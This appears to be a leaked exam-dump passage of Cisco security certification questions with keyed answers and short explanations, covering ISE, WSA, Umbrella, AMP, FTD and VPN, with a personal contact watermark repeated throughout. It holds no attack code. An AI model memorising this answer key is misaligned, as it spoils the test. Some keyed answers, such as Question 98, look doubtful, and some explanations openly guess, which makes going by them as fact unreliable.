Reference: https://www.cisco.com/c/dam/global/th_th/assets/docs/seminar/AMP_WSA.pdf

Question 69

When a next-generation endpoint security solution is selected for a company, what are two key
deliverables that help justify the implementation? (Choose two)

A. continuous monitoring of all files that are located on connected endpoints


B. macro-based protection to keep connected endpoints safe
C. signature-based endpoint protection on company endpoints
D. email integration to protect endpoints from malicious content that is located in email
E. real-time feeds from global threat intelligence centers

Answer: A E

Question 70

Which two actions does the Cisco Identity Services Engine posture module provide that ensures endpoint
security? (Choose two)

A. The latest antivirus updates are applied before access is allowed.


B. Assignments to endpoint groups are made dynamically, based on endpoint attributes.
C. Patch management remediation is performed.
D. A centralized management solution is deployed.
E. Endpoint supplicant configuration is deployed.

Answer: A C

Explanation

You can create a patch management remediation, which updates clients with up-to-date file definitions for
compliance after remediation.

Reference: https://www.cisco.com/c/en/us/td/docs/security/ise/2-
4/admin_guide/b_ISE_admin_guide_24/m_client_posture_policies.html

Question 71

Why should organizations migrate to an MFA strategy for authentication?

A. Single methods of authentication can be compromised more easily than MFA.


B. Biometrics authentication leads to the need for MFA due to its ability to be hacked easily.
C. MFA methods of authentication are never compromised.
D. MFA does not require any piece of evidence for an authentication mechanism.

Answer: A

Question 72

What is the purpose of joining Cisco WSAs to an appliance group?

A. All WSAs in the group can view file analysis results


B. It simplifies the task of patching multiple appliances
C. It supports cluster operations to expedite the malware analysis process
D. The group supports improved redundancy

Answer: D

Question 73
willsonliam55@gmail.com Skype Apple Kid

Which Cisco solution extends network visibility, threat detection, and analytics to public cloud
environments?

A. Cisco Umbrella
B. Cisco Stealthwatch Cloud
C. Cisco Appdynamics
D. Cisco CloudLock

Answer: B

Question 74

Which two Cisco ISE components must be configured for BYOD? (Choose two)

A. central WebAuth
B. local WebAuth
C. null WebAuth
D. guest
E. dual

Answer: A D

Question 75

Which configuration method provides the options to prevent physical and virtual endpoint devices that are
in the same base EPG or uSeg from being able to communicate with each other with Vmware VDS or
Microsoft vSwitch?

A. inter-EPG isolation
B. intra-EPG isolation
C. inter-VLAN security
D. placement in separate EPGs

Answer: B

Explanation

Intra-EPG Isolation is an option to prevent physical or virtual endpoint devices that are in the same base
EPG or uSeg EPG from communicating with each other. By default, endpoint devices included in the same
EPG are allowed to communicate with one another. However, conditions exist in which total isolation of the
endpoint devices from on another within an EPG is desirable. For example, you may want to enforce intra-
EPG isolation if the endpoint VMs in the same EPG belong to multiple tenants, or to prevent the possible
spread of a virus.

Reference: https://www.cisco.com/c/en/us/td/docs/switches/datacenter/aci/apic/sw/3-
x/virtualization/b_ACI_Virtualization_Guide_3_1_1/b_ACI_Virtualization_Guide_3_1_1_chapter_0101.html

Question 76

In which scenario is endpoint-based security the solution?

A. inspecting encrypted traffic


B. device profiling and authorization
C. performing signature-based application control
D. inspecting a password-protected archive

Answer: D

Question 77

What are two ways that Cisco Container Platform provides value to customers who utilize cloud service
providers? (Choose two)
willsonliam55@gmail.com Skype Apple Kid

A. allows developers to create code once and deploy to multiple clouds


B. helps maintain source code for cloud deployments
C. manages Docker containers
D. manages Kubernetes clusters
E. creates complex tasks for managing code

Answer: A D

Question 78

What is the recommendation in a zero-trust model before granting access to corporate applications and
resources?

A. to use multifactor authentication


B. to use strong passwords
C. to use a wired network, not wireless
D. to disconnect from the network when inactive

Answer: A

Question 79

An organization must add new firewalls to its infrastructure and wants to use Cisco ASA or Cisco FTD. The
chosen firewalls must provide methods of blocking traffic that include offering the user the option to
bypass the block for certain sites after displaying a warning page and to reset the connection. Which
solution should the organization choose?

A. Cisco FTD because it supports system rate level traffic blocking, whereas Cisco ASA does not
B. Cisco ASA because it allows for interactive blocking and blocking with reset to be configured via the
GUI, whereas Cisco FTD does not.
C. Cisco FTD because it enables interactive blocking and blocking with reset natively, whereas Cisco ASA
does not
D. Cisco ASA because it has an additional module that can be installed to provide multiple blocking
capabilities, whereas Cisco FTD does not.

Answer: C

Question 80

Which IETF attribute is supported for the RADIUS CoA feature?

A. 81 Message-Authenticator
B. 30 Calling-Station-ID
C. 42 Acct-Session-ID
D. 24 State

Answer: D

Explanation

The RADIUS Change of Authorization (CoA) feature provides a mechanism to change the attributes of an
authentication,authorization,and accounting(AAA)session after it is authenticated.When a policy changes
for a user or user group in AAA,administrators can send the RADIUS CoA packets from the AAA server
such as a Cisco Secure Access Control Server (ACS) to reinitialize authentication and apply the new policy

The following table shows the IETF attributes that are supported for the RADIUS Change of Authorization
(CoA) feature.
willsonliam55@gmail.com Skype Apple Kid

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_usr_aaa/configuration/xe-16-10/sec-
usr-aaa-xe-16-10-book/sec-rad-coa.pdf

Question 81

Which Cisco cloud security software centrally manages policies on multiple platforms such as Cisco ASA,
Cisco Firepower, Cisco Meraki, and AWS?

A. Cisco Secureworks
B. Cisco Configuration Professional
C. Cisco Defense Orchestrator
D. Cisco DNAC

Answer: C

Explanation

Cisco Defense Orchestrator is a cloud-based management solution that allows you to manage security
policies and device configurations with ease across multiple Cisco and cloud-native security platforms.

Cisco Defense Orchestrator features:


….
Management of hybrid environments: Managing a mix of firewalls running the ASA, FTD, and Meraki
MX software is now easy, with the ability to share policy elements across platforms.

Reference: https://www.cisco.com/c/en/us/products/collateral/security/defense-orchestrator/datasheet-
c78-736847.html

Question 82

Which Cisco DNA Center Intent API action is used to retrieve the number of devices known to a DNA
Center?

A. GET https://fqdnOrlPofDnaCenterPlatform/dna/intent/api/v1/network-device/count
B. GET https://fqdnOrlPofDnaCenterPlatform/dna/intent/api/v1/network-device
C. GET
https://fqdnOrlPofDnaCenterPlatform/dna/intent/api/v1/networkdevice?parameter1=value&parameter2=v
alue&….
D. GET https://fqdnOrlPofDnaCenterPlatform/dna/intent/api/v1/networkdevice/startIndex/recordsToReturn

Answer: A

Explanation
willsonliam55@gmail.com Skype Apple Kid

“/dna/intent/api/v1/network-device/count”

Description: Returns the count of network devices based on the filter criteria by management IP address,
mac address, hostname and location name.

Reference: https://developer.cisco.com/docs/dna-center/#!get-device-count-1

Question 83

What is the difference between a vulnerability and an exploit?

A. A vulnerability is a hypothetical event for an attacker to exploit


B. An exploit is a hypothetical event that causes a vulnerability in the network
C. An exploit is a weakness that can cause a vulnerability in the network
D. A vulnerability is a weakness that can be exploited by an attacker

Answer: D

Explanation

A vulnerability is a weakness in a software system. And an exploit is an attack that leverages that
vulnerability.

Question 84

An administrator needs to configure the Cisco ASA via ASDM such that the network management system
can actively monitor the host using SNMPv3. Which two tasks must be performed for this configuration?
(Choose two)

A. Specify the SNMP manager and UDP port.


B. Specify an SNMP user group
C. Specify a community string.
D. Add an SNMP USM entry
E. Add an SNMP host access entry

Answer: A E

Explanation

This is how to configure SNMP on your Cisco ASA using ASDM:


The first order of business is to navigate to the screen shown below:

Next, click on the Add button above and the window below appears:
willsonliam55@gmail.com Skype Apple Kid

Question 85

Which Cisco security solution determines if an endpoint has the latest OS updates and patches installed on
the system?

A. Cisco Endpoint Security Analytics


B. Cisco AMP for Endpoints
C. Endpoint Compliance Scanner
D. Security Posture Assessment Service

Answer: D

Question 86

When a transparent authentication fails on the Web Security Appliance, which type of access does the end
user get?

A. guest
B. limited Internet
C. blocked
D. full Internet

Answer: C

Question 87

Using Cisco Cognitive Threat Analytics, which platform automatically blocks risky sites, and test unknown
sites for hidden advanced threats before allowing users to click them?

A. Cisco Identity Services Engine


B. Cisco Enterprise Security Appliance
willsonliam55@gmail.com Skype Apple Kid

C. Cisco Web Security Appliance


D. Cisco Advanced Stealthwatch Appliance

Answer: C

Question 88

Which technology provides a combination of endpoint protection endpoint detection, and response?

A. Cisco AMP
B. Cisco Talos
C. Cisco Threat Grid
D. Cisco Umbrella

Answer: A

Question 89

When a Cisco WSA checks a web request, what occurs if it is unable to match a user-defined policy?

A. It blocks the request.


B. It applies the global policy.
C. It applies the next identification profile policy.
D. It applies the advanced policy.

Answer: B

Question 90

Which solution supports high availability in routed or transparent mode as well as in northbound and
southbound deployments?

A. Cisco FTD with Cisco ASDM


B. Cisco FTD with Cisco FMC
C. Cisco Firepower NGFW physical appliance with Cisco. FMC
D. Cisco Firepower NGFW Virtual appliance with Cisco FMC

Answer: B

Question 91

Which endpoint protection and detection feature performs correlation of telemetry, files, and intrusion
events that are flagged as possible active breaches?

A. retrospective detection
B. elastic search
C. file trajectory
D. indication of compromise

Answer: D

Explanation

Indications of compromise (IoCs): File and telemetry events are correlated and prioritized as potential
active breaches. AMP automatically correlates multisource security event data, such as intrusion and
malware events, to help security teams connect events to larger, coordinated attacks and also prioritize
high-risk events.

Reference: https://www.cisco.com/c/en/us/solutions/collateral/enterprise-networks/advanced-malware-
protection/solution-overview-c22-734228.html
willsonliam55@gmail.com Skype Apple Kid

Question 92

Which RADIUS feature provides a mechanism to change the AAA attributes of a session after it is
authenticated?

A. Authorization
B. Accounting
C. Authentication
D. CoA

Answer: D

Question 93

Which two authentication protocols are supported by the Cisco WSA? (Choose two)

A. WCCP
B. NTLM
C. TLS
D. SSL
E. LDAP

Answer: B E

Question 94

Which technology should be used to help prevent an attacker from stealing usernames and passwords of
users within an organization?

A. RADIUS-based REAP
B. fingerprinting
C. Dynamic ARP Inspection
D. multifactor authentication

Answer: D

Explanation

Credential stuffing is a type of cyberattack in which a cybercriminal uses stolen usernames and passwords
from one organization (obtained in a breach or purchased off of the dark web) to access user accounts at
another organization.

How To Prevent Credential Stuffing Attacks


Most people know password reuse is unsafe but choose to use the same password on multiple sites
anyway because they have roughly 100 passwords to remember. Password managers are an option, but
adoption rates are low. So to prevent credential stuffing attacks, it’s up to organizations to take measures
— such as removing passwords altogether — to ensure cybercriminals can’t use stolen credentials to
access their users’ accounts. Below are several methods for doing so.

Multi-factor authentication (MFA) is a highly effective way to prevent credential stuffing because it requires
users to log in with another form of authentication in addition to a username-password combination. For
example, this could mean biometric authentication such as a fingerprint, a one-time code sent to a device
associated with the user, or an email sent to a secured account — none of which a cybercriminal will have
access to.

Reference: https://auth0.com/blog/what-is-credential-stuffing/

Question 95

Which baseline form of telemetry is recommended for network infrastructure devices?

A. SDNS
B. NetFlow
willsonliam55@gmail.com Skype Apple Kid

C. passive taps
D. SNMP

Answer: D

Question 96

Refer to the exhibit.

Consider that any feature of DNS requests, such as the length off the domain name and the number of
subdomains, can be used to construct models of expected behavior to which observed values can be
compared. Which type of malicious attack are these values associated with?

A. Spectre Worm
B. Eternal Blue Windows
C. Heartbleed SSL Bug
D. W32/AutoRun worm

Answer: D

Question 97

Drag and drop the posture assessment flow actions from the left into a sequence on the right.

Answer:

Step 1: Validate user credentials


Step 2: Permit just enough for the posture assessment
Step 3: Check device compliance with security policy
Step 4: Apply updates or take other necessary action
Step 5: Grant appropriate access with compliant device

Question 98

Which Cisco WSA feature supports access control using URL categories?
willsonliam55@gmail.com Skype Apple Kid

A. transparent user identification


B. SOCKS proxy services
C. web usage controls
D. user session restrictions

Answer: A

Question 99

What is an advantage of the Cisco Umbrella roaming client?

A. the ability to see all traffic without requiring TLS decryption


B. visibility into IP-based threats by tunneling suspicious IP connections
C. the ability to dynamically categorize traffic to previously uncategorized sites
D. visibility into traffic that is destined to sites within the office environment

Answer: B

Explanation

The Umbrella roaming client enables security at the DNS and IP layers, in the cloud, no matter where the
endpoint is located. The client simply forwards DNS requests or tunnels suspect IP connections to the
Umbrella global network.

Reference: https://learn-umbrella.cisco.com/feature-briefs/lightweight-transparent-roaming-client

Question 100

An organization has DHCP servers set up to allocate IP addresses to clients on the LAN. What must be
done to ensure the LAN switches prevent malicious DHCP traffic while also distributing IP addresses to the
correct endpoints?

A. Configure Dynamic ARP Inspection and add entries in the DHCP snooping database
B. Configure DHCP snooping and set an untrusted interface for all clients
C. Configure Dynamic ARP Inspection and antispoofing ACLs in the DHCP snooping database
D. Configure DHCP snooping and set a trusted interface for the DHCP server

Answer: D

Explanation

Dynamic ARP inspection is a security feature that validates ARP packets in a network. Dynamic ARP
inspection determines the validity of packets by performing an IP-to-MAC address binding inspection
stored in a trusted database, (the DHCP snooping binding database) before forwarding the packet to the
appropriate destination.

But this question asks about “prevent malicious DHCP traffic” so DHCP snooping is a better choice.

DHCP snooping is a feature which allows a Cisco switch to inspect DHCP traffic traversing a layer two
segment and track which IP addresses have been assigned to hosts on which switch ports.

We need to set a trusted interface (which is connected to the real DHCP server) because all the interfaces
are untrusted by default.

Question 101

Refer to the exhibit.


willsonliam55@gmail.com Skype Apple Kid

What is the result of the Python script?

A. It uses the POST HTTP method to obtain a username and password to be used for authentication
B. It uses the POST HTTP method to obtain a token to be used for authentication
C. It uses the GET HTTP method to obtain a token to be used for authentication
D. It uses the GET HTTP method to obtain a username and password to be used for authentication

Answer: B

Question 102

Which solution stops unauthorized access to the system if a user’s password is compromised?

A. VPN
B. MFA
C. AMP
D. SSL

Answer: B

Question 103

Which feature enables a Cisco ISR to use the default bypass list automatically for web filtering?

A. filters
B. group key
C. company key
D. connector

Answer: D

Question 104

Which industry standard is used to integrate Cisco ISE and pxGrid to each other and with other
interoperable security platforms?

A. IEEE
B. IETF
C. NIST
D. ANSI

Answer: B

Question 105

What is a function of the Layer 4 Traffic Monitor on a Cisco WSA?

A. blocks traffic from URL categories that are known to contain malicious content
B. decrypts SSL traffic to monitor for malicious content
C. monitors suspicious traffic across all the TCP/UDP ports
D. prevents data exfiltration by searching all the network traffic for specified sensitive information
willsonliam55@gmail.com Skype Apple Kid

Answer: C

Explanation

The Web Security appliance has an integrated Layer-4 Traffic Monitor that detects rogue traffic across all
network ports and stops malware attempts to bypass port 80.

Reference: https://www.cisco.com/c/en/us/td/docs/security/wsa/wsa11-
0/user_guide/b_WSA_UserGuide/b_WSA_UserGuide_chapter_010110.html

Question 106

Which solution is made from a collection of secure development practices and guidelines that developers
must follow to build secure applications?

A. OWASP
B. Fuzzing Framework
C. Radamsa
D. AFL

Answer: A

Explanation

OWASP secure coding is a set of secure coding best practices and guidelines put out by the Open Source
Foundation for Application Security. It outlines both general software security principles and secure coding
requirements.

Reference: https://snyk.io/learn/secure-coding-practices/

Question 107

What is the process of performing automated static and dynamic analysis of files against preloaded
behavioral indicators for threat analysis?

A. deep visibility scan


B. point-in-time checks
C. advanced sandboxing
D. advanced scanning

Answer: C

Question 108

Which Cisco ISE service checks the compliance of endpoints before allowing the endpoints to connect to
the network?

A. posture
B. profiler
C. Cisco TrustSec
D. Threat Centric NAC

Answer: A

Explanation

Posture is a service in Cisco Identity Services Engine (Cisco ISE) that allows you to check the compliance,
also known as posture, of endpoints, before allowing them to connect to your network.

Reference: https://www.cisco.com/c/en/us/td/docs/security/ise/2-
2/admin_guide/b_ise_admin_guide_22/b_ise_admin_guide_22_chapter_010111.html

Question 109

Refer to the exhibit.


willsonliam55@gmail.com Skype Apple Kid

import requests

client_id = ‘a1b2c3d4e5f6g7h8i9j0’

api_key = ‘a1b2c3d4-e5f6-g7h8-i9j0-
k1l2m3n4o5p6’

What does the API key do while working with https://api.amp.cisco.com/v1/computers?

A. displays client ID
B. HTTP authorization
C. Imports requests
D. HTTP authentication

Answer: D

Explanation

Use API keys for APIs and data extraction. API keys authenticate your client application with Cisco GMM
and includes an access key ID and a secret access key in place of a username and password. API keys are
used by partners who do not have access to the Cisco GMM Cloud Application.

For example, use API Keys to:

Securely authenticate API calls from external systems

Reference: https://developer.cisco.com/docs/GMM/#!generate-api-keys/generate-api-keys

Question 110

How does the Cisco WSA enforce bandwidth restrictions for web applications?

A. It implements a policy route to redirect application traffic to a lower-bandwidth link


B. It dynamically creates a scavenger class QoS policy and applies it to each client that connects through
the WSA
C. It sends commands to the uplink router to apply traffic policing to the application traffic
D. It simulates a slower link by introducing latency into application traffic

Answer: D

Explanation

Defining bandwidth limits only throttles the data going to users. It does not block data based on reaching
a quota. The Web Proxy introduces latency into each application transaction to mimic a slower link to the
server.

Reference: https://www.cisco.com/c/en/us/td/docs/security/wsa/wsa11-
8/user_guide/b_WSA_UserGuide_11_8/b_WSA_UserGuide_11_7_chapter_01111.html

Question 111

Which feature within Cisco ISE verifies the compliance of an endpoint before providing access to the
network?

A. Posture
B. Profiling
C. pxGrid
D. MAB

Answer: A

Question 112

Which Cisco AMP feature allows an engineer to look back to trace past activities, such as file and process
activity on an endpoint?
willsonliam55@gmail.com Skype Apple Kid

A. endpoint isolation
B. advanced search
C. advanced investigation
D. retrospective security

Answer: D

Explanation

Retrospective security lets administrators look at their systems as if they had a time machine. They can
view any point in the past with tools such as retrospection, attack chain correlation, behavioral indications
of compromise (IOCs), trajectory and breach hunting. Plus, they can see how their security environments
have changed, rather than just viewing network aspects at a single point.

Reference: https://imaginenext.ingrammicro.com/security/comparison-point-in-time-vs-retrospective-
security
willsonliam55@gmail.com Skype Apple Kid

Question 1

What is a functional difference between a Cisco ASA and a Cisco IOS router with Zone-based policy
firewall?

A. The Cisco ASA denies all traffic by default whereas the Cisco IOS router with Zone-Based Policy Firewall
starts out by allowing all traffic, even on untrusted interfaces.
B. The Cisco IOS router with Zone-Based Policy Firewall can be configured for high availability, whereas
the Cisco ASA cannot
C. The Cisco IOS router with Zone-Based Policy Firewall denies all traffic by default, whereas the Cisco
ASA starts out by allowing all traffic until rules are added
D. The Cisco ASA can be configured for high availability whereas the Cisco IOS router with Zone-Based
Policy Firewall cannot

Answer: A

Explanation

Both Cisco ASA and Cisco IOS router with Zone-based policy firewall support High Availability (HA).
Zone-Based Policy Firewall drops traffic if it is from a different zone by default. So we cannot say if Cisco
IOS router with Zone-Based Policy Firewall allows or denies traffic by default.
Cisco ASA drops all traffic by default.

But we found a similar answer to this question:

The ASA denies all traffic by default, while the IOS router starts out by allowing all traffic, even on your
untrusted interfaces.

Reference: https://www.plixer.com/blog/cisco-zone-based-firewall-reporting/

So maybe this question wanted to say Cisco IOS router allows all traffic by default (before implementing
Zone-Based Policy Firewall).

Question 2

What is a benefit of performing device compliance?

A. verification of the latest OS patches


B. device classification and authorization
C. providing multi-factor authentication
D. providing attribute-driven policies

Answer: A

Question 3

Which cloud model is a collaborative effort where infrastructure is shared and jointly accessed by several
organizations from a specific group?

A. hybrid
B. community
C. private
D. public

Answer: B

Explanation

Community Cloud allows system and services to be accessible by group of organizations. It shares the
infrastructure between several organizations from a specific community. It may be managed internally by
organizations or by the third-party.

Question 4
willsonliam55@gmail.com Skype Apple Kid

Which cryptographic process provides origin confidentiality, integrity, and origin authentication for
packets?

A. IKEv1
B. AH
C. ESP
D. IKEv2

Answer: C

Question 5

An organization wants to secure users, data, and applications in the cloud. The solution must be API-based
and operate as a cloud-native CASB. Which solution must be used for this implementation?

A. Cisco Cloudlock
B. Cisco Cloud Email Security
C. Cisco Firepower Next-Generation Firewall
D. Cisco Umbrella

Answer: A

Explanation

Cisco Cloudlock: Secure your cloud users, data, and applications with the cloud-native Cloud Access
Security Broker (CASB) and cloud cybersecurity platform.

Reference: https://www.cisco.com/c/dam/en/us/products/collateral/security/cloud-web-security/at-a-
glance-c45-738565.pdf

Question 6

What are two Trojan malware attacks? (Choose two)

A. frontdoor
B. rootkit
C. smurf
D. backdoor
E. sync

Answer: B D

Question 7

What is the role of Cisco Umbrella Roaming when it is installed on an endpoint?

A. to protect the endpoint against malicious file transfers


B. to ensure that assets are secure from malicious links on and off the corporate network
C. to establish secure VPN connectivity to the corporate network
D. to enforce posture compliance and mandatory software

Answer: B

Explanation

Umbrella Roaming is a cloud-delivered security service for Cisco’s next-generation firewall. It protects your
employees even when they are off the VPN.

Question 8

What is a capability of Cisco ASA Netflow?


willsonliam55@gmail.com Skype Apple Kid

A. It filters NSEL events based on traffic.


B. It generates NSEL events even if the MPF is not configured.
C. It logs all event types only to the same collector.
D. It sends NetFlow data records from active and standby ASAs in an active standby failover pair.

Answer: A

Question 9

Which component of Cisco umbrella architecture increases reliability of the service?

A. Anycast IP
B. AMP Threat grid
C. Cisco Talos
D. BGP route reflector

Answer: A

Explanation

Cisco Umbrella Uses Anycast IP routing in order to provide reliability of the recursive DNS service.

Question 10

What is the benefit of integrating Cisco ISE with a MDM solution?

A. It provides compliance checks for access to the network


B. It provides the ability to update other applications on the mobile device
C. It provides the ability to add applications to the mobile device through Cisco ISE
D. It provides network device administration access

Answer: A

Explanation

Mobile Device Management (MDM) software secures, monitors, manages and supports mobile devices
deployed across mobile operators, service providers and enterprises. A typical MDM product consists of a
policy server, a mobile device client and an optional inline enforcement point that controls the use of some
applications on a mobile device (like email) in the deployed environment. However the network is the only
entity that can provide granular access to endpoints (based on ACL’s, TrustSec SGT’s etc). It is envisaged
that Cisco Identity Services Engine (ISE) would be an additional network based enforcement point while
the MDM policy server would serve as the policy decision point. ISE expects specific data from MDM
servers to provide a complete solution

The following are the high level use cases in this solution.
+ Device registration- Non registered endpoints accessing the network on-premises will be redirected to
registration page on MDM server for registration based on user role, device type, etc
+ Remediation- Non compliant endpoints will be given restricted access based on compliance state
+ Periodic compliance check – Periodically check with MDM server for compliance
+ Ability for ISE administrators to issue remote actions on the device through the MDM server (e.g.:
remote wiping of the managed device)
+ Ability for end user to leverage the ISE My Devices Portal to manage personal devices, e.g. Full Wipe,
Corporate Wipe and PIN Lock.

Reference: https://community.cisco.com/t5/security-documents/cisco-ise-integration-with-mobile-device-
management-mdm/ta-p/3784691

Also in the attached PDF of above link:

If the user device is not in compliant to the posture (compliance) policies configured on MDM, they will be
notified that the device is out of compliance, reason for non-compliance and the need to be in compliance
to access network resources.

Question 11
willsonliam55@gmail.com Skype Apple Kid

An administrator configures a new destination list in Cisco Umbrella so that the organization can block
specific domains for its devices. What should be done to ensure that all subdomains of domain.com are
blocked?

A. Configure the *.com address in the block list.


B. Configure the *.domain.com address in the block list
C. Configure the www.domain.com address in the block list
D. Configure the domain.com address in the block list

Answer: D

Explanation

It is not possible to use an asterisk to wildcard a different part of the domain. The following will not work:
*.domain.com
subdomain.*.com
sub*.com
domain.*

Reference: https://docs.umbrella.com/deployment-umbrella/docs/wild-cards

By configuring domain.com address in the block list, we implied to block *.domain.com/* (all subdomains
would be blocked too).

Question 12

An organization wants to provide visibility and to identify active threats in its network using a VM. The
organization wants to extract metadata from network packet flow while ensuring that payloads are not
retained or transferred outside the network. Which solution meets these requirements?

A. Cisco Umbrella Cloud


B. Cisco Stealthwatch Cloud PNM
C. Cisco Stealthwatch Cloud PCM
D. Cisco Umbrella On-Premises

Answer: B

Explanation

Private Network Monitoring (PNM) provides visibility and threat detection for the on-premises network,
delivered from the cloud as a SaaS solution. It is the perfect solution for organizations who prefer SaaS
products and desire better awareness and security in their on-premises environments while reducing
capital expenditure and operational overhead. It works by deploying lightweight software in a virtual
machine or server that can consume a variety of native sources of telemetry or extract metadata from
network packet flow. It encrypts this metadata and sends it to the Stealthwatch Cloud analytics platform
for analysis. Stealthwatch Cloud consumes metadata only. The packet payloads are never retained or
transferred outside the network.

This lab focuses on how to configure a Stealthwatch Cloud Private Network Monitoring (PNM) Sensor, in
order to provide visibility and effectively identify active threats, and monitors user and device behavior
within on-premises networks.

The Stealthwatch Cloud PNM Sensor is an extremely flexible piece of technology, capable of being utilized
in a number of different deployment scenarios. It can be deployed as a complete Ubuntu based virtual
appliance on different hypervisors (e.g. –VMware, VirtualBox). It can be deployed on hardware running a
number of different Linux-based operating systems.

Reference: https://www.ciscolive.com/c/dam/r/ciscolive/us/docs/2019/pdf/5eU6DfQV/LTRSEC-2240-
LG2.pdf

Question 13

An organization deploys multiple Cisco FTD appliances and wants to manage them using one centralized
solution. The organization does not have a local VM but does have existing Cisco ASAs that must migrate
over to Cisco FTDs. Which solution meets the needs of the organization?
willsonliam55@gmail.com Skype Apple Kid

A. Cisco FMC
B. CSM
C. Cisco FDM
D. CDO

Answer: A

Question 14

An organization wants to secure data in a cloud environment. Its security model requires that all users be
authenticated and authorized. Security configuration and posture must be continuously validated before
access is granted or maintained to applications and data. There is also a need to allow certain application
traffic and deny all other traffic by default. Which technology must be used to implement these
requirements?

A. virtual routing and forwarding


B. microsegmentation
C. access control policy
D. virtual LAN

Answer: B

Explanation

Zero Trust is a security framework requiring all users, whether in or outside the organization’s network, to
be authenticated, authorized, and continuously validated for security configuration and posture before
being granted or keeping access to applications and data. Zero Trust assumes that there is no traditional
network edge; networks can be local, in the cloud, or a combination or hybrid with resources anywhere as
well as workers in any location.

The Zero Trust model uses microsegmentation — a security technique that involves dividing perimeters
into small zones to maintain separate access to every part of the network — to contain attacks.

Question 15

A Cisco FTD engineer is creating a new IKEv2 policy called s2s00123456789 for their organization to allow
for additional protocols to terminate network devices with. They currently only have one policy established
and need the new policy to be a backup in case some devices cannot support the stronger algorithms
listed in the primary policy. What should be done in order to support this?

A. Change the integrity algorithms to SHA* to support all SHA algorithms in the primary policy
B. Make the priority for the new policy 5 and the primary policy 1.
C. Change the encryption to AES* to support all AES algorithms in the primary policy
D. Make the priority for the primary policy 10 and the new policy 1

Answer: B

Explanation

All IKE policies on the device are sent to the remote peer regardless of what is in the selected policy
section. The first IKE Policy matched by the remote peer will be selected for the VPN connection. Choose
which policy is sent first using the priority field. Priority 1 will be sent first.

Reference: https://www.cisco.com/c/en/us/support/docs/security-vpn/ipsec-negotiation-ike-
protocols/215470-site-to-site-vpn-configuration-on-ftd-ma.html

Question 16

Which type of encryption uses a public key and private key?

A. asymmetric
B. symmetric
C. linear
D. nonlinear
willsonliam55@gmail.com Skype Apple Kid

Answer: A

Question 17

What are two features of NetFlow flow monitoring? (Choose two)

A. Can track ingress and egress information


B. Include the flow record and the flow importer
C. Copies all ingress flow information to an interface
D. Does not required packet sampling on interfaces
E. Can be used to track multicast, MPLS, or bridged traffic

Answer: A E

Explanation

The following are restrictions for Flexible NetFlow:


+ Traditional NetFlow (TNF) accounting is not supported.
+ Flexible NetFlow v5 export format is not supported, only NetFlow v9 export format is supported.
+ Both ingress and egress NetFlow accounting is supported.
+ Microflow policing feature shares the NetFlow hardware resource with FNF.
+ Only one flow monitor per interface and per direction is supported.

Reference: https://www.cisco.com/en/US/docs/switches/lan/catalyst3850/software/release/3se/consolidat
ed_guide/b_consolidated_3850_3se_cg_chapter_011010.html

When configuring NetFlow, follow these guidelines and restrictions:

+ Except in PFC3A mode, NetFlow supports bridged IP traffic. PFC3A mode does not support NetFlow
bridged IP traffic.
+ NetFlow supports multicast IP traffic.

Reference: https://www.cisco.com/en/US/docs/general/Test/dwerblo/broken_guide/netflow.html

The Flexible NetFlow – MPLS Egress NetFlow feature allows you to capture IP flow information for packets
that arrive on a router as Multiprotocol Label Switching (MPLS) packets and are transmitted as IP packets.
This feature allows you to capture the MPLS VPN IP flows that are traveling through the service provider
backbone from one site of a VPN to another site of the same VPN

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-
book/cfg-mpls-netflow.html

Question 18

A customer has various external HTTP resources available including Intranet Extranet and Internet, with a
proxy configuration running in explicit mode. Which method allows the client desktop browsers to be
configured to select when to connect direct or when to use the proxy?

A. Transport mode
B. Forward file
C. PAC file
D. Bridge mode

Answer: C

Explanation

A Proxy Auto-Configuration (PAC) file is a JavaScript function definition that determines whether web
browser requests (HTTP, HTTPS, and FTP) go direct to the destination or are forwarded to a web proxy
server.
PAC files are used to support explicit proxy deployments in which client browsers are explicitly configured
to send traffic to the web proxy. The big advantage of PAC files is that they are usually relatively easy to
create and maintain.
willsonliam55@gmail.com Skype Apple Kid

Question 19

Which Talos reputation center allows for tracking the reputation of IP addresses for email and web traffic?

A. IP and Domain Reputation Center


B. File Reputation Center
C. IP Slock List Center
D. AMP Reputation Center

Answer: A

Question 20

An engineer is configuring IPsec VPN and needs an authentication protocol that is reliable and supports
ACK and sequence. Which protocol accomplishes this goal?

A. AES-192
B. IKEv1
C. AES-256
D. ESP

Answer: D

Question 21

An administrator is establishing a new site-to-site VPN connection on a Cisco IOS router. The organization
needs to ensure that the ISAKMP key on the hub is used only for terminating traffic from the IP address of
172.19.20.24. Which command on the hub will allow the administrator to accomplish this?

A. crypto ca identity 172.19.20.24


B. crypto isakmp key Cisco0123456789 172.19.20.24
C. crypto enrollment peer address 172.19.20.24
D. crypto isakmp identity address 172.19.20.24

Answer: B

Explanation

The command “crypto isakmp identity address 172.19.20.24” is not valid. We can only use “crypto isakmp
identity {address | hostname}. The following example uses preshared keys at two peers and sets both
their ISAKMP identities to the IP address.

At the local peer (at 10.0.0.1) the ISAKMP identity is set and the preshared key is specified:
crypto isakmp identity address
crypto isakmp key sharedkeystring address 192.168.1.33

At the remote peer (at 192.168.1.33) the ISAKMP identity is set and the same preshared key is specified:
crypto isakmp identity address
crypto isakmp key sharedkeystring address 10.0.0.1

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-cr-
c4.html#wp3880782430

The command “crypto enrollment peer address” is not valid either.

The command “crypto ca identity …” is only used to declare a trusted CA for the router and puts you in the
ca-identity configuration mode. Also it should be followed by a name, not an IP address. For example:
“crypto ca identity CA-Server” -> Answer A is not correct.

Only answer B is the best choice left.

Question 22

What is a difference between an XSS attack and an SQL injection attack?


willsonliam55@gmail.com Skype Apple Kid

A. SQL injection is a hacking method used to attack SQL databases, whereas XSS attacks can exist in
many different types of applications
B. XSS is a hacking method used to attack SQL databases, whereas SQL injection attacks can exist in
many different types of applications
C. SQL injection attacks are used to steal information from databases whereas XSS attacks are used to
redirect users to websites where attackers can steal data from them
D. XSS attacks are used to steal information from databases whereas SQL injection attacks are used to
redirect users to websites where attackers can steal data from them

Answer: C

Explanation

In XSS, an attacker will try to inject his malicious code (usually malicious links) into a database. When
other users follow his links, their web browsers are redirected to websites where attackers can steal data
from them. In a SQL Injection, an attacker will try to inject SQL code (via his browser) into forms, cookies,
or HTTP headers that do not use data sanitizing or validation methods of GET/POST parameters.

Question 23

